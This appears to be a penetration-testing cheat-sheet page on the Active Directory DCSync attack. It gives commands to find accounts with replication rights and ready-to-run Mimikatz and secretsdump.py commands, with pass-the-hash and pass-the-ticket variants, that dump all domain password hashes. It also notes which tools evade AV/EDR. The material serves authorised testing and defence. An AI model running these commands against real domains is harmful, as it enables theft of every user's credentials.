DCSync

DCSync Overview

DC Sync is a legitimate function of Active Directory environments where a domain controller will make a sync request from a another domain controller in the environment, as such this is not functionality that can be disabled.

Normally, this function is restricted to administrative users and groups, but on the occasion that domain ACLs are misconfigured and a user is granted rights to request this sync, it could result in the leaking of hashed credentials of all users in the domain.

Enumerating ACLs

PowerShell AD Module

I put this one first, because it is unlikely to be flagged by on-system AV/EDR, unlike PowerView, which is almost completely likely to get flagged and removed.

See PowerShell AD Module on Any Domain Host as Any User

# Assumes domain is contoso.org
# List any objects with ACLs to perform a DC sync

Get-Acl "ad:\dc=contoso,dc=org" | 
Select -Expand access | 
Where { 
	$_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or `
    $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or `
    $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" 
} | Select -Expand IdentityReference -Unique | Sort

PowerView

# Assumes domain is contoso.org
# Enumerate objects with ACLs to perform DC sync

Get-ObjectAcl -DistinguishedName "dc=contoso,dc=org" -ResolveGUIDs | 
Where {	$_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll' }

DCSync Attack

Mimikatz (Local)

If you've exploited a host where you have a TGT of a user who can DCSync, you can use Mimikatz to perform the attack.

# Assumes the domain is contoso.org
# Dump all hashes from the domain controller

lsadump::dcsync /dc:dc01.contoso.org /domain:contoso.org /all /csv

# Assumes the domain is contoso.org
# Dump all hashes from the domain controller
# PowerShell Invoke-Mimikatz

Invoke-Mimikatz 'lsadump::dcsync /dc:dc01.contoso.org /domain:contoso.org /all /csv'

secretsdump.py (Remote)

# Assumes domain is contoso.org
# Password Authentication
secretsdump.py -outputfile 'dcsync.txt' 'contoso.org/username:userpassword@dc-ip-address'

# Pass the hash
secretsdump.py -outputfile 'dcsync.txt' -hashes 'lm-hash':'nt-hash' 'contoso.org/username@dc-ip-address'

# Pass the ticket
# If proxying through jump host, add dc-fqdn to /etc/hosts
python getTGT.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'contoso.org/username'
export KRB5CCNAME='username.ccache'
secretsdump.py -k -outputfile 'something' 'contoso.org/username@dc-fqdn'

References

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync

https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync

Enumerating Hosts and Identifying the Domain Controllers

LLMNR Poisoning (Internal)

SMB Relay (Internal/External)

IPv6 DNS Spoofing (Internal)

NULL Session Enumeration (Internal/External)

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting (Internal/External)

Passback Attacks (Internal/External)

PrintNightmare (Internal/External)

NTLM Credential Stuffing (Internal/External)

PowerShell AD Module on Any Domain Host as Any User

Dumping DNS Records with adidnsdump

CrackMapExec

PowerView

BloodHound

Remote Bloodhound

LdapDomainDump

LdapSearch

Enum4Linux

GetADUsers.py

GetUserSPNs.py

Manual Enumeration

Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs

Mimikatz

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

Impacket-Addcomputer

DCSync

Pass the Password

Pass the Hash

Pass the Ticket

Pass the Key

Password & Credential Brute Force

Token Impersonation

Spawn Processes as Other Users

Kerberoasting

Group Policy Preferences (GPP)

PrintNightmare

ZeroLogon

xfreerdp

DCSync

DCSync Overview

Enumerating ACLs

PowerShell AD Module

PowerView

DCSync Attack

Mimikatz (Local)

secretsdump.py (Remote)

References